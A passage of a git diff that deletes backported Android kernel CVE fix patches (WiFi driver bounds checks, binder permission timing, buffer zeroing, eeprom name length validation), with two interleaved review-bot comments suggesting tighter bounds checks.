---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -702,7 +702,7 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- GFP_KERNEL);
-
- if (!hotlist_params) {
-- WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len));
-+ WL_ERR(("Cannot Malloc mem.\n"));
- return -ENOMEM;
- }
-
-@@ -711,10 +711,33 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- nla_for_each_attr(iter, data, len, tmp2) {
- type = nla_type(iter);
- switch (type) {
-+ case GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT:
-+ if (nla_len(iter) != sizeof(uint32)) {
-+ WL_DBG(("type:%d length:%d not matching.\n",
-+ type, nla_len(inner)));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ hotlist_params->nbssid = (uint16)nla_get_u32(iter);
-+ if ((hotlist_params->nbssid == 0) ||
-+ (hotlist_params->nbssid > PFN_SWC_MAX_NUM_APS)) {
-+ WL_ERR(("nbssid:%d exceed limit.\n",
-+ hotlist_params->nbssid));
-+ err = -EINVAL;
-+ goto exit;
-+ }
-+ break;
- case GSCAN_ATTRIBUTE_HOTLIST_BSSIDS:
-+ if (hotlist_params->nbssid == 0) {
-+ WL_ERR(("nbssid not retrieved.\n"));
-+ err = -EINVAL;
-+ goto exit;
-+ }
- pbssid = hotlist_params->bssid;
- nla_for_each_nested(outer, iter, tmp) {
- nla_for_each_nested(inner, outer, tmp1) {
-+ if (j >= hotlist_params->nbssid)
-+ break;
- type = nla_type(inner);
-
- switch (type) {
-@@ -751,13 +774,13 @@ static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
- break;
- }
- }
-- if (++j > PFN_SWC_MAX_NUM_APS) {
-- WL_DBG(("nbssid:%d exeed limit.\n",
-- hotlist_params->nbssid));
-- err = -EINVAL;
-- goto exit;
-- }
-- hotlist_params->nbssid = j;
-+ j++;
-+ }
-+ if (j != hotlist_params->nbssid) {
-+ WL_ERR(("bssid_cnt:%d != nbssid:%d.\n", j,
-+ hotlist_params->nbssid));
-+ err = -EINVAL;
-+ goto exit;
- }
- break;
- case GSCAN_ATTRIBUTE_HOTLIST_FLUSH:
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.h b/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-index 58077b3..7d33c62 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.h
-@@ -181,6 +181,7 @@ enum gscan_attributes {
- GSCAN_ATTRIBUTE_RSSI_HIGH,
- GSCAN_ATTRIBUTE_HOSTLIST_BSSID_ELEM,
- GSCAN_ATTRIBUTE_HOTLIST_FLUSH,
-+ GSCAN_ATTRIBUTE_HOTLIST_BSSID_COUNT,
-
- /* remaining reserved for additional attributes */
- GSCAN_ATTRIBUTE_RSSI_SAMPLE_SIZE = 60,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8466/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8466/3.10/0001.patch
deleted file mode 100644
index d024359b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8466/3.10/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 67d429b1cb87879c33df58febc0b7bf6712bc7c0 Mon Sep 17 00:00:00 2001
-From: Ram Sripathi
-Date: Fri, 4 Nov 2016 15:44:14 -0700
-Subject: [PATCH] net: wireless: bcmdhd: Heap over write in
- dhdmsgbuf_query_ioctl
-
-handled heap overwrite with checks
-
-Change-Id: I9e9bc97a3f410d40d9bc6a44707a6c0f8917cd31
-Bug: 31822524
-Signed-off-by: Ram Sripathi
----
- drivers/net/wireless/bcmdhd/dhd_msgbuf.c | 28 +++++++++++++++-------------
- 1 file changed, 15 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_msgbuf.c b/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-index cb5018c52f10b..90f9733a7e36c 100644
---- a/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-@@ -2612,22 +2612,24 @@ static int
- dhdmsgbuf_query_ioctl(dhd_pub_t *dhd, int ifidx, uint cmd, void *buf, uint len, uint8 action)
- {
- dhd_prot_t *prot = dhd->prot;
--
- int ret = 0;
-
-- DHD_TRACE(("%s: Enter\n", __FUNCTION__));
--
-- /* Respond "bcmerror" and "bcmerrorstr" with local cache */
-- if (cmd == WLC_GET_VAR && buf)
-- {
-- if (!strcmp((char *)buf, "bcmerrorstr"))
-- {
-- strncpy((char *)buf, bcmerrorstr(dhd->dongle_error), BCME_STRLEN);
-+ DHD_TRACE(("%s: Enter\n", __func__));
-+ if (!buf || !len) {
-+ DHD_ERROR(("%s(): Zero length bailing\n", __func__));
-+ ret = BCME_BADARG;
-+ goto done;
-+ }
-+ if (cmd == WLC_GET_VAR) {
-+ /* Respond "bcmerror" and "bcmerrorstr" with local cache */
-+ if ((len > strlen("bcmerrorstr")) &&
-+ !strcmp(buf, "bcmerrorstr")) {
-+ strlcpy(buf, bcmerrorstr(dhd->dongle_error), len);
- goto done;
-- }
-- else if (!strcmp((char *)buf, "bcmerror"))
-- {
-- *(int *)buf = dhd->dongle_error;
-+ } else if ((len > strlen("bcmerror")) &&
-+ !strcmp(buf, "bcmerror")) {
-+ memcpy(buf, &dhd->dongle_error,
-+ sizeof(dhd->dongle_error));
- goto done;
- }
- }
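Review bot: Nothing in the rewritten `WLC_GET_VAR` branch of `dhdmsgbuf_query_ioctl` says why `len` is compared with `strlen(...)` before each `strcmp`, and that comparison is what keeps the string compare and the copy that follows inside the caller's buffer. A comment above the first test, such as `/* len must cover the name and its NUL so strcmp() cannot read past buf */`, would stop a later cleanup from dropping the guard. The `memcpy` of `sizeof(dhd->dongle_error)` bytes relies on the same guard (`len` greater than 8), which holds as long as `dongle_error` stays an `int`-sized field; its declaration is not visible here. The 3.18/0002.patch copy of this change is identical, and the function continues outside the hunk.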
diff --git a/Patches/Linux_CVEs/CVE-2016-8466/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8466/3.18/0002.patch
deleted file mode 100644
index 49762309..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8466/3.18/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 4af032a458109027c88c478c800aac97a7105250 Mon Sep 17 00:00:00 2001
-From: Ram Sripathi
-Date: Fri, 4 Nov 2016 15:44:14 -0700
-Subject: net: wireless: bcmdhd: Heap over write in dhdmsgbuf_query_ioctl
-
-handled heap overwrite with checks
-
-Signed-off-by: Ram Sripathi
-Bug: 31822524
-Change-Id: I9e9bc97a3f410d40d9bc6a44707a6c0f8917cd31
----
- drivers/net/wireless/bcmdhd/dhd_msgbuf.c | 28 +++++++++++++++-------------
- 1 file changed, 15 insertions(+), 13 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_msgbuf.c b/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-index 8d7d4bf..e6e2848 100644
---- a/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_msgbuf.c
-@@ -2493,22 +2493,24 @@ static int
- dhdmsgbuf_query_ioctl(dhd_pub_t *dhd, int ifidx, uint cmd, void *buf, uint len, uint8 action)
- {
- dhd_prot_t *prot = dhd->prot;
--
- int ret = 0;
-
-- DHD_TRACE(("%s: Enter\n", __FUNCTION__));
--
-- /* Respond "bcmerror" and "bcmerrorstr" with local cache */
-- if (cmd == WLC_GET_VAR && buf)
-- {
-- if (!strcmp((char *)buf, "bcmerrorstr"))
-- {
-- strncpy((char *)buf, bcmerrorstr(dhd->dongle_error), BCME_STRLEN);
-+ DHD_TRACE(("%s: Enter\n", __func__));
-+ if (!buf || !len) {
-+ DHD_ERROR(("%s(): Zero length bailing\n", __func__));
-+ ret = BCME_BADARG;
-+ goto done;
-+ }
-+ if (cmd == WLC_GET_VAR) {
-+ /* Respond "bcmerror" and "bcmerrorstr" with local cache */
-+ if ((len > strlen("bcmerrorstr")) &&
-+ !strcmp(buf, "bcmerrorstr")) {
-+ strlcpy(buf, bcmerrorstr(dhd->dongle_error), len);
- goto done;
-- }
-- else if (!strcmp((char *)buf, "bcmerror"))
-- {
-- *(int *)buf = dhd->dongle_error;
-+ } else if ((len > strlen("bcmerror")) &&
-+ !strcmp(buf, "bcmerror")) {
-+ memcpy(buf, &dhd->dongle_error,
-+ sizeof(dhd->dongle_error));
- goto done;
- }
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8468/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-8468/3.18/0001.patch
deleted file mode 100644
index 97434d64..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8468/3.18/0001.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 0d37d64f02e18a301867ae7684c3801bd99c5df2 Mon Sep 17 00:00:00 2001
-From: Martijn Coenen
-Date: Tue, 8 Nov 2016 20:12:16 +0100
-Subject: [PATCH] Android: binder: check set_context_mgr permission on time.
-
-Bug: 32394425
-Change-Id: I860c6aab97850bff05a56e96cd3f4b41691bfd96
-Signed-off-by: Martijn Coenen
----
- drivers/staging/android/binder.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/android/binder.c b/drivers/staging/android/binder.c
-index ad902dbac8fa5..56f9713de523c 100644
---- a/drivers/staging/android/binder.c
-+++ b/drivers/staging/android/binder.c
-@@ -2784,6 +2784,9 @@ static int binder_ioctl_set_ctx_mgr(struct file *filp)
- ret = -EBUSY;
- goto out;
- }
-+ ret = security_binder_set_context_mgr(proc->tsk);
-+ if (ret < 0)
-+ goto out;
- if (uid_valid(binder_context_mgr_uid)) {
- if (!uid_eq(binder_context_mgr_uid, curr_euid)) {
- pr_err("BINDER_SET_CONTEXT_MGR bad uid %d != %d\n",
-@@ -2849,9 +2852,6 @@ static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- ret = binder_ioctl_set_ctx_mgr(filp);
- if (ret)
- goto err;
-- ret = security_binder_set_context_mgr(proc->tsk);
-- if (ret < 0)
-- goto err;
- break;
- case BINDER_THREAD_EXIT:
- binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
diff --git a/Patches/Linux_CVEs/CVE-2016-8473/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8473/ANY/0001.patch
deleted file mode 100644
index 8acfa4c8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8473/ANY/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From 900b8b72c57cefebb39c150dfddfdd493a1cea79 Mon Sep 17 00:00:00 2001
-From: Steve Pfetsch
-Date: Mon, 7 Nov 2016 16:20:11 -0800
-Subject: [PATCH] input: ldaf: Initialize buffers before use.
-
-Prevent writing uninitialized stack data to calibration files by
-zeroing out buffers upon creation.
-
-Bug: 31799972
-Bug: 31795790
-Change-Id: Ic848d4d1e181818f461e4b61ad73ada28a474bd1
----
- drivers/input/misc/vl6180/stmvl6180_module.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/input/misc/vl6180/stmvl6180_module.c b/drivers/input/misc/vl6180/stmvl6180_module.c
-index c61cc0f063424..78bc7f6844c33 100755
---- a/drivers/input/misc/vl6180/stmvl6180_module.c
-+++ b/drivers/input/misc/vl6180/stmvl6180_module.c
-@@ -107,7 +107,7 @@ static int stmvl6180_stop(struct stmvl6180_data *data);
- static void stmvl6180_read_calibration_file(void)
- {
- struct file *f;
-- char buf[8];
-+ char buf[8] = {0};
- mm_segment_t fs;
- int i, is_sign = 0;
-
-@@ -184,7 +184,7 @@ static void stmvl6180_read_calibration_file(void)
- static void stmvl6180_write_offset_calibration_file(void)
- {
- struct file *f = NULL;
-- char buf[8];
-+ char buf[8] = {0};
- mm_segment_t fs;
-
- f = filp_open(CAL_FILE_OFFSET, O_CREAT | O_TRUNC | O_RDWR,
-@@ -207,7 +207,7 @@ static void stmvl6180_write_offset_calibration_file(void)
- static void stmvl6180_write_xtalk_calibration_file(void)
- {
- struct file *f = NULL;
-- char buf[8];
-+ char buf[8] = {0};
- mm_segment_t fs;
-
- f = filp_open(CAL_FILE_XTALK, O_CREAT | O_TRUNC | O_RDWR,
diff --git a/Patches/Linux_CVEs/CVE-2016-8474/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8474/ANY/0001.patch
deleted file mode 100644
index 8acfa4c8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8474/ANY/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From 900b8b72c57cefebb39c150dfddfdd493a1cea79 Mon Sep 17 00:00:00 2001
-From: Steve Pfetsch
-Date: Mon, 7 Nov 2016 16:20:11 -0800
-Subject: [PATCH] input: ldaf: Initialize buffers before use.
-
-Prevent writing uninitialized stack data to calibration files by
-zeroing out buffers upon creation.
-
-Bug: 31799972
-Bug: 31795790
-Change-Id: Ic848d4d1e181818f461e4b61ad73ada28a474bd1
----
- drivers/input/misc/vl6180/stmvl6180_module.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/input/misc/vl6180/stmvl6180_module.c b/drivers/input/misc/vl6180/stmvl6180_module.c
-index c61cc0f063424..78bc7f6844c33 100755
---- a/drivers/input/misc/vl6180/stmvl6180_module.c
-+++ b/drivers/input/misc/vl6180/stmvl6180_module.c
-@@ -107,7 +107,7 @@ static int stmvl6180_stop(struct stmvl6180_data *data);
- static void stmvl6180_read_calibration_file(void)
- {
- struct file *f;
-- char buf[8];
-+ char buf[8] = {0};
- mm_segment_t fs;
- int i, is_sign = 0;
-
-@@ -184,7 +184,7 @@ static void stmvl6180_read_calibration_file(void)
- static void stmvl6180_write_offset_calibration_file(void)
- {
- struct file *f = NULL;
-- char buf[8];
-+ char buf[8] = {0};
- mm_segment_t fs;
-
- f = filp_open(CAL_FILE_OFFSET, O_CREAT | O_TRUNC | O_RDWR,
-@@ -207,7 +207,7 @@ static void stmvl6180_write_offset_calibration_file(void)
- static void stmvl6180_write_xtalk_calibration_file(void)
- {
- struct file *f = NULL;
-- char buf[8];
-+ char buf[8] = {0};
- mm_segment_t fs;
-
- f = filp_open(CAL_FILE_XTALK, O_CREAT | O_TRUNC | O_RDWR,
diff --git a/Patches/Linux_CVEs/CVE-2016-8475/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8475/ANY/0001.patch
deleted file mode 100644
index ade51786..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8475/ANY/0001.patch
+++ /dev/null
@@ -1,27 +0,0 @@
-From d906945fc287f9df48b99349fea962b921d4d39e Mon Sep 17 00:00:00 2001
-From: matt_huang
-Date: Mon, 7 Nov 2016 16:22:57 +0800
-Subject: [PATCH] input: misc: fix security vulnerability
-
-initialize the structure before using
-Bug: 32591129
-
-Change-Id: I9a3af40175d929009522f6c93005d82535c4ccc3
-Signed-off-by: matt_huang
----
- drivers/input/misc/vl53L0/stmvl53l0_module.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/input/misc/vl53L0/stmvl53l0_module.c b/drivers/input/misc/vl53L0/stmvl53l0_module.c
-index 0028e527857f5..cc27309fc4e20 100644
---- a/drivers/input/misc/vl53L0/stmvl53l0_module.c
-+++ b/drivers/input/misc/vl53L0/stmvl53l0_module.c
-@@ -2483,6 +2483,8 @@ static int stmvl53l0_ioctl_handler(struct file *file,
- if (!data->enable_ps_sensor)
- stmvl53l0_start(data, 3, NORMAL_MODE);
-
-+ memset(&RangingMeasurementData, 0, sizeof(RangingMeasurementData));
-+
- for (i = 0; i < RANGE_MEASUREMENT_TIMES;)
- {
- Status = papi_func_tbl->PerformSingleRangingMeasurement(vl53l0_dev, &RangingMeasurementData);
diff --git a/Patches/Linux_CVEs/CVE-2016-8476/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-8476/qcacld-2.0/0001.patch
deleted file mode 100644
index 43e0e974..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8476/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From bfe8035bce6fec72ed1d064b94529fce8fb09799 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Fri, 18 Nov 2016 08:04:08 -0800
-Subject: qcacld-2.0: Validate "set passpoint list" network count
-
-Currently when processing the "set passpoint list" vendor command the
-"number of networks" parameter is not limit checked. This value is
-subsequently used to calculate the size of a buffer. Add a limit check
-to ensure that an appropriately sized buffer is always allocated.
-
-Change-Id: Ibc2346b8a62898fc47e2d1efe457c57c08b0cada
-CRs-Fixed: 1091940
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 7 ++++++-
- CORE/MAC/inc/sirApi.h | 1 +
- 2 files changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 77a3ae9..a2ff8fe 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -5246,8 +5246,13 @@ static int __wlan_hdd_cfg80211_set_passpoint_list(struct wiphy *wiphy,
- }
- num_networks = nla_get_u32(
- tb[QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NUM]);
-- hddLog(LOG1, FL("num networks %u"), num_networks);
-+ if (num_networks > SIR_PASSPOINT_LIST_MAX_NETWORKS) {
-+ hddLog(LOGE, FL("num networks %u exceeds max %u"),
-+ num_networks, SIR_PASSPOINT_LIST_MAX_NETWORKS);
-+ return -EINVAL;
-+ }
-
-+ hddLog(LOG1, FL("num networks %u"), num_networks);
- req_msg = vos_mem_malloc(sizeof(*req_msg) +
- (num_networks * sizeof(req_msg->networks[0])));
- if (!req_msg) {
-diff --git a/CORE/MAC/inc/sirApi.h b/CORE/MAC/inc/sirApi.h
-index c5074d2..fd0adb2 100644
---- a/CORE/MAC/inc/sirApi.h
-+++ b/CORE/MAC/inc/sirApi.h
-@@ -5773,6 +5773,7 @@ struct wifi_epno_params
- struct wifi_epno_network networks[];
- };
-
-+#define SIR_PASSPOINT_LIST_MAX_NETWORKS 8
- #define SIR_PASSPOINT_REALM_LEN 256
- #define SIR_PASSPOINT_ROAMING_CONSORTIUM_ID_NUM 16
- #define SIR_PASSPOINT_PLMN_LEN 3
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8477/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8477/3.10/0001.patch
deleted file mode 100644
index 9501aef2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8477/3.10/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From 33c9042e38506b04461fa99e304482bc20923508 Mon Sep 17 00:00:00 2001
-From: guyang
-Date: Tue, 6 Dec 2016 18:30:38 +0800
-Subject: msm: camera: sensor: Validate eeprom_name string length
-
-Validate eeprom_name string length before copying into
-the userspace buffer.
-If more data than required is copied, userspace has the access to
-some of kernel data which is not intended.
-
-CRs-Fixed: 1090007
-Change-Id: Id40a287e0b1a93cc15d9b02c757fe9f347e285f2
-Signed-off-by: Rajesh Bondugula
-Signed-off-by: VijayaKumar T M
-Signed-off-by: Yang Guang
----
- .../media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c | 11 +++++++++--
- include/media/msm_cam_sensor.h | 2 +-
- 2 files changed, 10 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-index 059780d..13ad58e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-@@ -140,15 +140,22 @@ static int msm_eeprom_config(struct msm_eeprom_ctrl_t *e_ctrl,
- struct msm_eeprom_cfg_data *cdata =
- (struct msm_eeprom_cfg_data *)argp;
- int rc = 0;
-+ size_t length = 0;
-
- CDBG("%s E\n", __func__);
- switch (cdata->cfgtype) {
- case CFG_EEPROM_GET_INFO:
- CDBG("%s E CFG_EEPROM_GET_INFO\n", __func__);
- cdata->is_supported = e_ctrl->is_supported;
-+ length = strlen(e_ctrl->eboard_info->eeprom_name) + 1;
-+ if (length > MAX_EEPROM_NAME) {
-+ pr_err("%s:%d invalid eeprom_name length %d\n",
-+ __func__,__LINE__, (int)length);
-+ rc = -EINVAL;
-+ break;
-+ }
- memcpy(cdata->cfg.eeprom_name,
-- e_ctrl->eboard_info->eeprom_name,
-- sizeof(cdata->cfg.eeprom_name));
-+ e_ctrl->eboard_info->eeprom_name, length);
- break;
- case CFG_EEPROM_GET_CAL_DATA:
- CDBG("%s E CFG_EEPROM_GET_CAL_DATA\n", __func__);
-diff --git a/include/media/msm_cam_sensor.h b/include/media/msm_cam_sensor.h
-index 9497875..7ff89a4 100644
---- a/include/media/msm_cam_sensor.h
-+++ b/include/media/msm_cam_sensor.h
-@@ -446,7 +446,7 @@ struct msm_eeprom_cfg_data {
- enum eeprom_cfg_type_t cfgtype;
- uint8_t is_supported;
- union {
-- char eeprom_name[MAX_SENSOR_NAME];
-+ char eeprom_name[MAX_EEPROM_NAME];
- struct eeprom_get_t get_data;
- struct eeprom_read_t read_data;
- struct eeprom_write_t write_data;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8477/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-8477/3.18/0002.patch
deleted file mode 100644
index f1f00026..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8477/3.18/0002.patch
+++ /dev/null
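Review bot: The new length test in `msm_eeprom_config` compares against `MAX_EEPROM_NAME` rather than the destination, so the `memcpy` is only safe while `cfg.eeprom_name` is declared with exactly that macro; `if (length > sizeof(cdata->cfg.eeprom_name))` ties the check to the buffer that is written. This matters most in the 3.18/0002.patch copy, where `msm_eeprom_config32` applies the same test to `struct msm_eeprom_cfg_data32`, whose declaration is not among the visible hunks. Using `strnlen(e_ctrl->eboard_info->eeprom_name, sizeof(cdata->cfg.eeprom_name))` in place of `strlen` would also bound the scan of the source string. Both functions continue outside their hunks.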
@@ -1,92 +0,0 @@
-From 96145eb5f0631f0e105d47abebc8f940f7621eeb Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula
-Date: Tue, 15 Nov 2016 13:52:49 -0800
-Subject: msm: camera: sensor: Validate eeprom_name string length
-
-Validate eeprom_name string length before copying into
-the userspace buffer.
-If more data than required is copied, userspace has the access to
-some of kernel data which is not intended.
-
-This change will fix the issue.
-
-CRs-Fixed: 1090007
-Signed-off-by: Rajesh Bondugula
-Change-Id: Id40a287e0b1a93cc15d9b02c757fe9f347e285f2
----
- .../msm/camera_v2/sensor/eeprom/msm_eeprom.c | 22 ++++++++++++++++++----
- include/uapi/media/msm_cam_sensor.h | 2 +-
- 2 files changed, 19 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-index 1f891ac..037e8b5 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-@@ -617,6 +617,7 @@ static int msm_eeprom_config(struct msm_eeprom_ctrl_t *e_ctrl,
- struct msm_eeprom_cfg_data *cdata =
- (struct msm_eeprom_cfg_data *)argp;
- int rc = 0;
-+ size_t length = 0;
-
- CDBG("%s E\n", __func__);
- switch (cdata->cfgtype) {
-@@ -629,9 +630,15 @@ static int msm_eeprom_config(struct msm_eeprom_ctrl_t *e_ctrl,
- }
- CDBG("%s E CFG_EEPROM_GET_INFO\n", __func__);
- cdata->is_supported = e_ctrl->is_supported;
-+ length = strlen(e_ctrl->eboard_info->eeprom_name) + 1;
-+ if (length > MAX_EEPROM_NAME) {
-+ pr_err("%s:%d invalid eeprom_name length %d\n",
-+ __func__, __LINE__, (int)length);
-+ rc = -EINVAL;
-+ break;
-+ }
- memcpy(cdata->cfg.eeprom_name,
-- e_ctrl->eboard_info->eeprom_name,
-- sizeof(cdata->cfg.eeprom_name));
-+ e_ctrl->eboard_info->eeprom_name, length);
- break;
- case CFG_EEPROM_GET_CAL_DATA:
- CDBG("%s E CFG_EEPROM_GET_CAL_DATA\n", __func__);
-@@ -1479,6 +1486,7 @@ static int msm_eeprom_config32(struct msm_eeprom_ctrl_t *e_ctrl,
- struct msm_eeprom_cfg_data32 *cdata =
- (struct msm_eeprom_cfg_data32 *)argp;
- int rc = 0;
-+ size_t length = 0;
-
- CDBG("%s E\n", __func__);
- switch (cdata->cfgtype) {
-@@ -1491,9 +1499,15 @@ static int msm_eeprom_config32(struct msm_eeprom_ctrl_t *e_ctrl,
- }
- CDBG("%s E CFG_EEPROM_GET_INFO\n", __func__);
- cdata->is_supported = e_ctrl->is_supported;
-+ length = strlen(e_ctrl->eboard_info->eeprom_name) + 1;
-+ if (length > MAX_EEPROM_NAME) {
-+ pr_err("%s:%d invalid eeprom_name length %d\n",
-+ __func__, __LINE__, (int)length);
-+ rc = -EINVAL;
-+ break;
-+ }
- memcpy(cdata->cfg.eeprom_name,
-- e_ctrl->eboard_info->eeprom_name,
-- sizeof(cdata->cfg.eeprom_name));
-+ e_ctrl->eboard_info->eeprom_name, length);
- break;
- case CFG_EEPROM_GET_CAL_DATA:
- CDBG("%s E CFG_EEPROM_GET_CAL_DATA\n", __func__);
-diff --git a/include/uapi/media/msm_cam_sensor.h b/include/uapi/media/msm_cam_sensor.h
-index 540a96c..b8f4b41 100644
---- a/include/uapi/media/msm_cam_sensor.h
-+++ b/include/uapi/media/msm_cam_sensor.h
-@@ -290,7 +290,7 @@ struct msm_eeprom_cfg_data {
- enum eeprom_cfg_type_t cfgtype;
- uint8_t is_supported;
- union {
-- char eeprom_name[MAX_SENSOR_NAME];
-+ char eeprom_name[MAX_EEPROM_NAME];
- struct eeprom_get_t get_data;
- struct eeprom_read_t read_data;
- struct eeprom_write_t write_data;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8478/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8478/ANY/0001.patch
deleted file mode 100644
index b08ceefb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8478/ANY/0001.patch
+++ /dev/null
@@ -1,73 +0,0 @@
-From e3af5e89426f1c8d4e703d415eff5435b925649f Mon Sep 17 00:00:00 2001
-From: Benet Clark
-Date: Thu, 10 Nov 2016 17:49:09 -0800
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1088206
-Change-Id: I04497bc11e01c3df4beadfd6d9b06ab4321f1723
-Signed-off-by: Benet Clark
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 5ad51dd..a9ab5c1 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -846,6 +846,7 @@ static int __from_user_pcc_coeff_v17(
- return -EFAULT;
- }
-
-+ memset(&pcc_cfg_payload, 0, sizeof(pcc_cfg_payload));
- pcc_cfg_payload.r.b = pcc_cfg_payload32.r.b;
- pcc_cfg_payload.r.g = pcc_cfg_payload32.r.g;
- pcc_cfg_payload.r.c = pcc_cfg_payload32.r.c;
-@@ -1127,6 +1128,8 @@ static int __from_user_igc_lut_data_v17(
- pr_err("failed to copy payload from user for igc\n");
- return -EFAULT;
- }
-+
-+ memset(&igc_cfg_payload, 0, sizeof(igc_cfg_payload));
- igc_cfg_payload.c0_c1_data = compat_ptr(igc_cfg_payload_32.c0_c1_data);
- igc_cfg_payload.c2_data = compat_ptr(igc_cfg_payload_32.c2_data);
- igc_cfg_payload.len = igc_cfg_payload_32.len;
-@@ -1261,6 +1264,7 @@ static int __from_user_pgc_lut_data_v1_7(
- pr_err("failed to copy from user the pgc32 payload\n");
- return -EFAULT;
- }
-+ memset(&pgc_cfg_payload, 0, sizeof(pgc_cfg_payload));
- pgc_cfg_payload.c0_data = compat_ptr(pgc_cfg_payload_32.c0_data);
- pgc_cfg_payload.c1_data = compat_ptr(pgc_cfg_payload_32.c1_data);
- pgc_cfg_payload.c2_data = compat_ptr(pgc_cfg_payload_32.c2_data);
-@@ -1470,6 +1474,7 @@ static int __from_user_hist_lut_data_v1_7(
- return -EFAULT;
- }
-
-+ memset(&hist_lut_cfg_payload, 0, sizeof(hist_lut_cfg_payload));
- hist_lut_cfg_payload.len = hist_lut_cfg_payload32.len;
- hist_lut_cfg_payload.data = compat_ptr(hist_lut_cfg_payload32.data);
-
-@@ -2024,6 +2029,7 @@ static int __from_user_pa_data_v1_7(
- return -EFAULT;
- }
-
-+ memset(&pa_cfg_payload, 0, sizeof(pa_cfg_payload));
- pa_cfg_payload.mode = pa_cfg_payload32.mode;
- pa_cfg_payload.global_hue_adj = pa_cfg_payload32.global_hue_adj;
- pa_cfg_payload.global_sat_adj = pa_cfg_payload32.global_sat_adj;
